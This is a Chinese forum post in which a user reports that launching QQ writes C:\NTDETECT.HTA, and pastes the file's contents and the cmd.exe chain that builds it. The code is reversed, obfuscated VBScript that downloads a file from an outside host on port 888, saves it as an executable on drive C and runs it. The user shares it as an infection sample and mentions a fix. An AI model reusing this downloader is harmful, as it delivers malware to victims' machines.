本帖最后由 小米 于 2018-4-27 04:52 编辑
今天发现的,只要一打开QQ,C盘根目录生成NTDETECT.HTA文件,内容是
>tpircs/<
esolc.wodniw
)Li(nuR.llehS
005 peels.tpircsw
2,Li eliFoTevaS.teGa
)ydoBesnopser.tsoP(etirW.teGa
)(nepO.teGa
1=epyT.teGa
3=edoM.teGa
))"","(","(ma(er(tS.BD(OD(A"(ecalper(tcejbOetaerC=teGa teS
)(dneS.tsoP
0,Ri,"TEG" nepO.tsoP
))"","*","l*l*eh*S.*tp*irc*s*W*"(ecalper(tcejbOetaerC=llehS teS
))"","~","~PT~T~HL~MX.2~l~mx~s~M"(ecalper(tcejbOetaerC = tsoP teS
)"exe.44tiniresu\:c"(esaCL=Li
)))yarrAeniLdmc(dnuoBU(yarrAeniLdmc(esaCL=Ri
)eniLdnammoc.ATHelpmaSyM(tilpS=yarrAeniLdmc
0,0 oTeziser.wodniw
0004,0004 oTevom.wodniw
txeN emuser rorre no
>sbv=egaugnal tpircs<
然后会执行
"C:\Windows\System32\cmd.exe" /q /c echo ^>C:\\NTDETECT.HTA&&echo ^^>tpircs/^<>>C:\\NTDETECT.HTA&&echo esolc.wodniw>>C:\\NTDETECT.HTA&&echo )Li(nuR.llehS>>C:\\NTDETECT.HTA&&echo 005 peels.tpircsw>>C:\\NTDETECT.HTA&&echo 2,Li eliFoTevaS.teGa>>C:\\NTDETECT.HTA&&echo )ydoBesnopser.tsoP(etirW.teGa>>C:\\NTDETECT.HTA&&echo )(nepO.teGa>>C:\\NTDETECT.HTA&&echo 1=epyT.teGa>>C:\\NTDETECT.HTA&&echo 3=edoM.teGa>>C:\\NTDETECT.HTA&&echo ))"","(","(ma(er(tS.BD(OD(A"(ecalper(tcejbOetaerC=teGa teS>>C:\\NTDETECT.HTA&&echo )(dneS.tsoP>>C:\\NTDETECT.HTA&&echo 0,Ri,"TEG" nepO.tsoP>>C:\\NTDETECT.HTA&&echo ))"","*","l*l*eh*S.*tp*irc*s*W*"(ecalper(tcejbOetaerC=llehS teS>>C:\\NTDETECT.HTA&&echo ))"","~","~PT~T~HL~MX.2~l~mx~s~M"(ecalper(tcejbOetaerC = tsoP teS>>C:\\NTDETECT.HTA&&echo )"exe.%time:~6,2%tiniresu\:c"(esaCL=Li>>C:\\NTDETECT.HTA
ing 127.0.0.1 -n 3 >nul&&echo )))yarrAeniLdmc(dnuoBU(yarrAeniLdmc(esaCL=Ri>>C:\\NTDETECT.HTA&&echo )eniLdnammoc.ATHelpmaSyM(tilpS=yarrAeniLdmc>>C:\\NTDETECT.HTA&&echo 0,0 oTeziser.wodniw>>C:\\NTDETECT.HTA&&echo 0004,0004 oTevom.wodniw>>C:\\NTDETECT.HTA&&echo txeN emuser rorre no>>C:\\NTDETECT.HTA&&echo ^>sbv=egaugnal tpircs^^>>C:\\NTDETECT.HTA&&C:\\NTDETECT.HTA http://www.399x8.cn:888/xz.s。w。f
去掉深蓝维护通道或者在维护通道服务端点一下三层解绑就没事了,不懂被什么注入了